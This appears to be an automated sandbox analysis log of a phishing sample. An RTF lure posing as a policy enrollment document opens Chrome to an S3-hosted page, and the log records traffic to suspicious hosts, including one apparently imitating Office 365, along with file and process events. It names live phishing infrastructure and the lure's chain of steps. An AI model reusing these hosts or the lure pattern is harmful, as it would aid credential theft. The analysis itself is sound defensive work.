Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gambol.smarthost.pl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: o365.alnassers.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://gambol.smarthost.plSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gambol.smarthost.pl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=f2cH6mg7mwxXTxP&MD=9XaRWou8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: s3.eu-west-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: gambol.smarthost.pl
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: o365.alnassers.net
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3054sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenx-amz-request-id: YJ63PRYS3FZ3PJRQx-amz-id-2: xHU5IVcc970Hie/RP0Egi2pvhf05sd8/yzpH1JNbPHHEFxhehIyTnbQ4bGW3pbmsRTDetzqXHgo=Content-Type: application/xmlTransfer-Encoding: chunkedDate: Fri, 15 Nov 2024 17:08:45 GMTServer: AmazonS3Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 17:08:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 17:08:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: xyBnte+b2URTw3LzDG2cSjimBCBECDwnWlQ=$ap1CCI1bxO9WW8omServer: cloudflareCF-RAY: 8e30d89b9c113166-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 17:09:00 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: h9qN/jOYx+5eZJhWNxZpiN0/zKZ4Xy5BRek=$5y6F4hU1IgtRhVKAServer: cloudflareCF-RAY: 8e30d8b41f09e8f9-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 17:09:03 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: uWfe9QC+TCFe1kqIDVlzXoSLlOcVdtqqNAY=$+cVqUfYYKMXDp/CLServer: cloudflareCF-RAY: 8e30d8caead90bcf-DFWalt-svc: h3=":443"; ma=86400
Source: LICENSE.txt.4.drString found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.4.drString found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: LICENSE.txt.4.drString found in binary or memory: https://easylist.to/)
Source: LICENSE.txt.4.drString found in binary or memory: https://github.com/easylist)
Source: unknownNetwork traffic detected: HTTP traffic on port 62653 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62647 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62643 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62576 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62639
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62652 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62646 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62642 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62645
Source: unknownNetwork traffic detected: HTTP traffic on port 62579 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62646
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62647
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62648
Source: unknownNetwork traffic detected: HTTP traffic on port 62582 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62649
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62607
Source: unknownNetwork traffic detected: HTTP traffic on port 62657 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62575 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62640
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62641
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62642
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62643
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62644
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 62649 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 62651 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62580
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62581
Source: unknownNetwork traffic detected: HTTP traffic on port 62607 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62645 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62584 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62641 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62578 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62579
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62656
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62657
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62658
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62639 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62581 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62658 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62650
Source: unknownNetwork traffic detected: HTTP traffic on port 62654 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62651
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62575
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62652
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62576
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62653
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62577
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62654
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62578
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62655
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62650 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62648 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62640 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62580 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62577 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62582
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 62655 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62584
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:62658 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_919302714Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_919302714\sets.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_919302714\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_919302714\LICENSEJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_919302714\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_919302714\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_919302714\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\LICENSE.txtJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\Filtering RulesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1052546650Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1052546650\cr_en-us_500000_index.binJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1052546650\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1052546650\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1052546650\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1052546650\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_6672_1633013866Jump to behavior
Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: gostname.xsl.0.drOLE indicator, VBA macros: true
Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
Source: chicago.xsl.0.drOLE indicator, VBA macros: true
Source: turabian.xsl.0.drOLE indicator, VBA macros: true
Source: sist02.xsl.0.drOLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
Source: gb.xsl.0.drOLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
Source: iso690.xsl.0.drOLE indicator, VBA macros: true
Source: chromecache_331.5.drOLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chromecache_331.5.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal60.phis.winRTF@26/287@28/14
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{1CC2CFF3-9DD5-432B-904A-B16705B06E9A} - OProcSessId.datJump to behavior
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Iamgold-PYMPATA Policy_Enrollment2024739441.rtf" /o ""
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,2302002758345039556,8558399744438251338,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,2302002758345039556,8558399744438251338,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Iamgold-PYMPATA Policy_Enrollment2024739441.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Iamgold-PYMPATA Policy_Enrollment2024739441.rtf
Source: Google Drive.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
